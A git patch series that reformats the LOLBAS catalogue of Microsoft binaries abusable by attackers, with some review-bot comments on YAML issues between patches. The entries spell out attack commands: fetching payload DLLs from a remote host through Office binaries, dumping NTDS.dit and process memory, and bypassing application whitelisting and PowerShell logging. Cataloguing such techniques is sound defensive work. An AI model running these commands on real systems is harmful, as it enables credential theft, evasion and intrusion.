@@ -2,7 +2,7 @@ Name: AgentExecutor.exe Description: Intune Management Extension included on Intune Managed Devices Author: 'Eleftherios Panos' -Created: '23/07/2020' +Created: 2020-07-23 Commands: - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument @@ -22,12 +22,12 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension -Code_Sample: +Code_Sample: - Code: -Detection: +Detection: - IOC: Resources: - - Link: + - Link: Acknowledgement: - Person: Eleftherios Panos Handle: '@lefterispan' diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index c9ea79d..d225d8c 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -1,8 +1,8 @@ --- Name: Appvlp.exe -Description: Application Virtualization Utility Included with Microsoft Office 2016 +Description: Application Virtualization Utility Included with Microsoft Office 2016 Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: AppVLP.exe \\webdav\calc.bat Usecase: Execution of BAT file hosted on Webdav server. diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index b7e2819..a387691 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -2,7 +2,7 @@ Name: Bginfo.exe Description: Background Information Utility included with SysInternals Suite Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 2411a0d..0183c57 100644 --- a/yml/OtherMSBinaries/Cdb.yml 
+++ b/yml/OtherMSBinaries/Cdb.yml @@ -2,7 +2,7 @@ Name: Cdb.exe Description: Debugging tool included with Windows Debugging Tools. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cdb.exe -cf x64_calc.wds -o notepad.exe Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. @@ -26,4 +26,4 @@ Resources: Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 46a5ea7..d43f486 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -2,7 +2,7 @@ Name: csi.exe Description: Command line interface included with Visual Studio. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: csi.exe file Description: Use csi.exe to run unsigned C# code. diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index dbea4fd..7c3d2fb 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -2,7 +2,7 @@ Name: DefaultPack.EXE Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. Author: '@checkymander' -Created: '2020-10-01' +Created: 2020-10-01 Commands: - Command: DefaultPack.EXE /C:"process.exe args" Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support. @@ -14,9 +14,9 @@ Commands: OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\ -Code_Sample: +Code_Sample: - Code: -Detection: +Detection: - IOC: DefaultPack.EXE spawned an unknown process Resources: - Link: https://twitter.com/checkymander/status/1311509470275604480. diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 5661204..e92c543 100644 
--- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -2,7 +2,7 @@ Name: Devtoolslauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: 'felamos' -Created: '2019-10-04' +Created: 2019-10-04 Commands: - Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. @@ -24,7 +24,7 @@ Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: - Code: -Detection: +Detection: - IOC: DeveloperToolsSvc.exe spawned an unknown process Resources: - Link: https://twitter.com/_felamos/status/1179811992841797632 diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index b133a8a..9b7d9a4 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -2,7 +2,7 @@ Name: dnx.exe Description: .Net Execution environment file included with .Net. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: dnx.exe consoleapp Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) @@ -23,4 +23,4 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 59e1f31..cd3d41d 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -2,7 +2,7 @@ Name: Dotnet.exe Description: dotnet.exe comes with .NET Framework Author: 'felamos' -Created: '2019-11-12' +Created: 2019-11-12 Commands: - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any dll even if applocker is enabled. 
@@ -28,7 +28,7 @@ Commands: OperatingSystem: Windows 10 with .NET Core installed Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' -Detection: +Detection: - IOC: dotnet.exe spawned an unknown process Resources: - Link: https://twitter.com/_felamos/status/1204705548668555264 @@ -38,5 +38,5 @@ Acknowledgement: - Person: felamos Handle: '@_felamos' - Person: Jimmy - Handle: '@bohops' + Handle: '@bohops' --- diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index ef13851..a7b5048 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -1,8 +1,8 @@ --- Name: Dxcap.exe -Description: DirectX diagnostics/debugger included with Visual Studio. +Description: DirectX diagnostics/debugger included with Visual Studio. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe Description: Launch notepad as a subprocess of Dxcap.exe @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index 6aba87a..6e569b1 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -2,7 +2,7 @@ Name: Excel.exe Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' -Created: '2019-07-19' +Created: 2019-07-19 Commands: - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll Description: Downloads payload from remote server @@ -38,4 +38,4 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 6cda996..88f65dc 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml 
@@ -2,7 +2,7 @@ Name: Mftrace.exe Description: Trace log generation tool for Media Foundation Tools. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Mftrace.exe cmd.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index dabf992..029d30e 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -2,7 +2,7 @@ Name: Msdeploy.exe Description: Microsoft tool used to deploy Web Applications. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index c11ad9f..e90152c 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -2,7 +2,7 @@ Name: msxsl.exe Description: Command line utility used to perform XSL transformations. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: msxsl.exe customers.xml script.xsl Description: Run COM Scriptlet code within the script.xsl file (local). diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index f9ae0f5..4269b8e 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -2,7 +2,7 @@ Name: ntdsutil.exe Description: Command line utility used to export Actove Directory. Author: 'Tony Lambert' -Created: '2020-01-10' +Created: 2020-01-10 Commands: - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q Description: Dump NTDS.dit into folder @@ -23,4 +23,4 @@ Resources: Acknowledgement: - Person: Sean Metcalf Handle: '@PyroTek3' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index ea1151a..d3684b7 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml 
+++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -2,7 +2,7 @@ Name: Powerpnt.exe Description: Microsoft Office binary. Author: 'Reegun J (OCBC Bank)' -Created: '2019-07-19' +Created: 2019-07-19 Commands: - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" Description: Downloads payload from remote server @@ -34,4 +34,4 @@ Resources: Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index cb2b30c..0c266ec 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -2,7 +2,7 @@ Name: rcsi.exe Description: Non-Interactive command line inerface included with Visual Studio. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index 723ec9d..830109a 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -2,7 +2,7 @@ Name: Sqldumper.exe Description: Debugging utility included with Microsoft SQL. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: sqldumper.exe 464 0 0x0110 Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index a6cc7b3..c0dce3f 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml 
@@ -2,7 +2,7 @@ Name: Sqlps.exe Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Sqlps.exe -noprofile Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 3963cce..562ddfc 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -2,7 +2,7 @@ Name: SQLToolsPS.exe Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index 64c0737..b0b6528 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml 
@@ -2,14 +2,14 @@ Name: Squirrel.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Reegun J (OCBC Bank) - @reegun21' -Created: '2019-06-26' +Created: 2019-06-26 Commands: - Command: squirrel.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User - MitreID: T1218 + MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: squirrel.exe --update [url to package] @@ -46,9 +46,9 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe' -Code_Sample: +Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel -Detection: +Detection: - IOC: Update.exe spawned an unknown process Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index b16704d..5b158f7 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -2,7 +2,7 @@ Name: te.exe Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF). Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: te.exe bypass.wsc Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index f7902a4..e0c4fc2 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml 
@@ -2,7 +2,7 @@ Name: Tracker.exe Description: Tool included with Microsoft .Net Framework. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 5195cf0..49809c5 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -2,14 +2,14 @@ Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Oddvar Moe' -Created: '2019-06-26' +Created: 2019-06-26 Commands: - Command: Update.exe --download [url to package] Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User - MitreID: T1218 + MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --update=[url to package] @@ -94,9 +94,9 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\update.exe' -Code_Sample: +Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel -Detection: +Detection: - IOC: Update.exe spawned an unknown process Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index e0be905..3dd820a 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml 
@@ -2,7 +2,7 @@ Name: vsjitdebugger.exe Description: Just-In-Time (JIT) debugger included with Visual Studio Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Vsjitdebugger.exe calc.exe Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. @@ -17,7 +17,7 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/pabraeken/status/990758590020452353 Acknowledgement: diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index b39a89f..86ac6a0 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -2,7 +2,7 @@ Name: Winword.exe Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' -Created: '2019-07-19' +Created: 2019-07-19 Commands: - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" Description: Downloads payload from remote server @@ -38,4 +38,4 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 06b6384..70965c3 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -2,7 +2,7 @@ Name: Wsl.exe Description: Windows subsystem for Linux executable Author: 'Matthew Brown' -Created: '2019-06-27' +Created: 2019-06-27 Commands: - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe Description: Executes calc.exe from wsl.exe From 38f9a0a0325d0090b447c2a024ec38ed14bea412 Mon Sep 17 00:00:00 2001 
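Review bot: in the Wsreset.yml hunk (and in every other `Created:` line this patch touches) dropping the quotes from `'2019-03-18'` changes the scalar's type, not only its style: a YAML 1.1 loader such as PyYAML resolves an unquoted `2019-03-18` to a `datetime.date`, whereas the quoted form was a string. If the site generator prints or sorts `Created` as text, either keep the quotes and normalise only the format (the `'23/07/2020'` to `2020-07-23` fix in Agentexecutor.yml is the part that matters) or confirm the consumer handles date objects, and say which in the commit message. While in this hunk: the context line `MitreID: T1088` refers to a technique ATT&CK has revoked in favour of T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control), so the ID and link could be updated at the same time.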
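Review bot: the `Command:` values in the CL_mutexverifiers.yml and Cl_invocation.yml hunks are plain (unquoted) scalars, so the `\\` and `\n` in `. C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1` are not escape sequences; the loaded string keeps the doubled backslashes and a literal backslash followed by `n`, which is not a runnable PowerShell line. Since this patch is about YAML correctness, either double-quote the value so the escapes are processed, or use a `|` block scalar with the dot-source and the function call written on two lines.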
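Review bot: the Ieframe.yml hunk edits `Created:` but leaves `Name: Ieaframe.dll` two lines above it; the file is Ieframe.yml and the command is `rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"`, so `Name` should read `Ieframe.dll`. Worth fixing while the hunk already touches this block, because `Name` is what the generated page and any lookups key on.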
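Review bot: in the Pcwutl.yml hunk the context line `Description: Microsoft HTML Viewer` is the same text as Mshtml.yml's description and does not describe pcwutl.dll, which is the Program Compatibility Wizard helper library (the command below it, `rundll32.exe pcwutl.dll,LaunchApplication calc.exe`, is the only thing on the page that is specific to it). Correcting the description alongside the `Created:` change would keep the two entries from looking like duplicates.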
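Review bot: the Cdb.yml hunk adds the trailing newline after `---`, but the key just above it is spelled `Acknoledgement:` while the other files use `Acknowledgement:`, so a consumer reading the canonical key still drops the credit for Matt Graeber. The same class of problem shows in the comsvcs.yml hunk, where `Handle:` is re-indented but left empty, and in the Advpack.yml hunk, where the key is `Acknowledegment:`. A single pass over key names in the YAML set (`Acknowledgement`, `Acknowledegment`, `Acknoledgement`) would catch all of these, and a small key-name check in CI would keep them from coming back.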
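Review bot: in the Squirrel.yml hunk the re-indented `Detection:` block still reads `- IOC: Update.exe spawned an unknown process`, which is Update.yml's IOC; the binary this file documents is `%localappdata%\Microsoft\Teams\current\Squirrel.exe`, so the IOC should name Squirrel.exe. The `MitreID: T1218` line in the same hunk changes only by trailing whitespace, which is fine, but note that this file's `MitreLink` uses `https://attack.mitre.org/techniques/T1218/` while other files in the series use the `/wiki/Technique/` form; one form should be chosen across the set.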
From: Wietze Date: Sun, 10 Jan 2021 15:26:27 +0000 Subject: [PATCH 03/19] Fixed incorrect MItreLink --- yml/LOLUtilz/OtherMSBinaries/Winword.yml | 2 +- yml/OSLibraries/Advpack.yml | 134 +++++++++---------- yml/OSLibraries/Ieadvpack.yml | 128 +++++++++---------- yml/OSLibraries/Ieframe.yml | 66 +++++----- yml/OSLibraries/Mshtml.yml | 56 ++++---- yml/OSLibraries/Pcwutl.yml | 56 ++++---- yml/OSLibraries/Setupapi.yml | 92 ++++++------- yml/OSLibraries/Shdocvw.yml | 64 +++++----- yml/OSLibraries/Shell32.yml | 102 +++++++-------- yml/OSLibraries/Syssetup.yml | 88 ++++++------- yml/OSLibraries/Url.yml | 156 +++++++++++------------ yml/OSLibraries/Zipfldr.yml | 78 ++++++------ 12 files changed, 511 insertions(+), 511 deletions(-) diff --git a/yml/LOLUtilz/OtherMSBinaries/Winword.yml b/yml/LOLUtilz/OtherMSBinaries/Winword.yml index 579b05a..6befdb8 100644 --- a/yml/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/yml/LOLUtilz/OtherMSBinaries/Winword.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - MItreLink: https://attack.mitre.org/wiki/Technique/T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full_Path: - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 86c8788..7d61259 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml 
@@ -1,67 +1,67 @@ ---- -Name: Advpack.dll -Description: Utility for installing software and drivers with rundll32.exe -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,RegisterOCX test.dll - Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe - Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" - Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. 
- Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\advpack.dll - - Path: c:\windows\syswow64\advpack.dll -Code_Sample: - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ - - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - - Link: https://twitter.com/bohops/status/974497123101179904 - - Link: https://twitter.com/moriarty_meng/status/977848311603380224 -Acknowledegment: - - Person: Jimmy (LaunchINFSection) - Handle: '@bohops' - - Person: Fabrizio (RegisterOCX - DLL) - Handle: '@0rbz_' - - Person: Moriarty (RegisterOCX - CMD) - Handle: '@moriarty_meng' - - Person: Nick Carr (Threat Intel) - Handle: '@ItsReallyNick' ---- +--- +Name: Advpack.dll +Description: Utility for installing software and drivers with rundll32.exe +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). 
+ UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe + Description: Launch an executable by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" + Description: Launch command line by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\advpack.dll + - Path: c:\windows\syswow64\advpack.dll +Code_Sample: + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ + - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 + - Link: https://twitter.com/bohops/status/974497123101179904 + - Link: https://twitter.com/moriarty_meng/status/977848311603380224 +Acknowledegment: + - Person: Jimmy (LaunchINFSection) + Handle: '@bohops' + - Person: Fabrizio (RegisterOCX - DLL) + Handle: '@0rbz_' + - Person: Moriarty (RegisterOCX - CMD) + Handle: 
'@moriarty_meng' + - Person: Nick Carr (Threat Intel) + Handle: '@ItsReallyNick' +--- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 93492cd..ef48be6 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml 
@@ -1,64 +1,64 @@ ---- -Name: Ieadvpack.dll -Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll - Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe - Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 ieadvpack.dll, RegisterOCX 